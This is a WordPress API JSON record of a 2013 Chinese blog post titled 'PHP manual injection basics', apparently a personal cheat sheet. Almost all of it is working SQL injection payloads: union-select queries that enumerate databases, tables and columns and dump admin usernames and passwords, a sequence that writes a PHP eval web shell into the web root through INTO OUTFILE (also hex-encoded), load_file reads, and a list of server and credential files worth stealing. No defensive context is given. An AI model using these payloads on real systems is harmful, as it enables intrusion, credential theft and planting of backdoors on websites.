{"id":2037,"date":"2013-05-21T08:57:11","date_gmt":"2013-05-21T00:57:11","guid":{"rendered":"https:\/\/sdeno.com\/?p=2037"},"modified":"2013-05-21T09:21:21","modified_gmt":"2013-05-21T01:21:21","slug":"php%e6%89%8b%e5%b7%a5%e6%b3%a8%e5%85%a5%e5%9f%ba%e7%a1%80%e7%9f%a5%e8%af%86","status":"publish","type":"post","link":"https:\/\/sdeno.com\/?p=2037","title":{"rendered":"php\u624b\u5de5\u6ce8\u5165\u57fa\u7840\u77e5\u8bc6"},"content":{"rendered":"<p>order by<\/p>\n<p>[code]and 1=2 union select 1,user(),database() \u67e5\u9009\u5f53\u524d\u7528\u6237\u540d \u5e93\u540d<br \/>\nunion select 1,group_concat(schema_name),3,4 from information_schema.schemata&#8211; \/\/\u5f53\u524d\u6240\u6709\u5e93\u540d[\/code]<\/p>\n<p>&nbsp;<br \/>\n[code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()&#8211; \u5f53\u524d\u5e93\u7684\u6240\u6709\u8868\u540d[\/code]<br \/>\n&nbsp;<br \/>\n[code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=\u5e93\u7684HEX&#8211; \u67e5\u8868\u540d[\/code]<br \/>\n&nbsp;<br \/>\n[code]union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=\u8868\u540d&#8211; \u67e5\u5b57\u6bb5[\/code]<\/p>\n<p>&nbsp;<br \/>\n[code]union select 1,concat_ws(0x3a,name,password),3,4 from admin&#8211;[\/code]<\/p>\n<p>&nbsp;<\/p>\n<p>[code]create table a (cmd text not null);<\/p>\n<p>insert into a (cmd) values(&#8216;&lt;?php eval($_post[cmd])?&gt;&#8217;);<\/p>\n<p>select cmd from a into outfile &#8216;d:\/www\/1.php&#8217;; \u6216\u8005select 0x3C3F706870206576616C28245F504F53545B636D645D293F3E into outfile&#8217;d:\/www\/1.php<\/p>\n<p>drop table if exists a;[\/code]<br \/>\nmanage\/Manage_backup.asp<br \/>\n[code]%20And%201=2%20union%20select%201,password,3,4,username%20from%20manage_user[\/code]<br \/>\n&nbsp;<br \/>\n[code]%20And%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%20from%20admin[\/code]<\/p>\n<p>&nbsp;<\/p>\n<p>[code]load_file(0x2F7661722F7777772F68746D6C2F776562726F6F742F6F6666696365777777726F6F742F73656374696F6E73322E706870)[\/code]<br \/>\n&nbsp;<br \/>\n\u5e38\u7528\u7684\u4e00\u4e9b\uff1a<br \/>\n\/usr\/local\/app\/apache2\/conf\/httpd.conf \/\/apache2\u7f3a\u7701\u914d\u7f6e\u6587\u4ef6<br \/>\n\/usr\/local\/apache2\/conf\/httpd.conf<br \/>\n\/usr\/local\/app\/apache2\/conf\/extra\/httpd-vhosts.conf \/\/\u865a\u62df\u7f51\u7ad9\u8bbe\u7f6e<br \/>\n\/usr\/local\/app\/php5\/lib\/php.ini \/\/PHP\u76f8\u5173\u8bbe\u7f6e<br \/>\n\/etc\/sysconfig\/iptables \/\/\u4ece\u4e2d\u5f97\u5230\u9632\u706b\u5899\u89c4\u5219\u7b56\u7565<br \/>\n\/etc\/httpd\/conf\/httpd.conf \/\/ apache\u914d\u7f6e\u6587\u4ef6<br \/>\n\/etc\/rsyncd.conf \/\/\u540c\u6b65\u7a0b\u5e8f\u914d\u7f6e\u6587\u4ef6<br \/>\n\/etc\/sysconfig\/network-scripts\/ifcfg-eth0 \/\/\u67e5\u770bIP.<br \/>\n\/etc\/my.cnf \/\/mysql\u7684\u914d\u7f6e\u6587\u4ef6<br \/>\n\/etc\/redhat-release \/\/\u7cfb\u7edf\u7248\u672c<br \/>\n\/etc\/issue<br \/>\n\/etc\/issue.net<br \/>\nc:\\mysql\\data\\mysql\\user.MYD \/\/\u5b58\u50a8\u4e86mysql.user\u8868\u4e2d\u7684\u6570\u636e\u5e93\u8fde\u63a5\u5bc6\u7801<br \/>\nc:\\Program Files\\RhinoSoft.com\\Serv-U\\ServUDaemon.ini \/\/\u5b58\u50a8\u4e86\u865a\u62df\u4e3b\u673a\u7f51\u7ad9\u8def\u5f84\u548c\u5bc6\u7801<br \/>\nc:\\Program Files\\Serv-U\\ServUDaemon.ini<br \/>\nc:\\windows\\my.ini \/\/MYSQL\u914d\u7f6e\u6587\u4ef6<br \/>\nc:\\windows\\system32\\inetsrv\\MetaBase.xml \/\/IIS\u914d\u7f6e\u6587\u4ef6<\/p>\n","protected":false},"excerpt":{"rendered":"<p>order by [code]and 1=2 union select 1,user(),database() [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"close","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,9],"tags":[],"class_list":["post-2037","post","type-post","status-publish","format-standard","hentry","category-php","category-9"],"_links":{"self":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/posts\/2037","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2037"}],"version-history":[{"count":0,"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/posts\/2037\/revisions"}],"wp:attachment":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2037"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2037"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2037"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}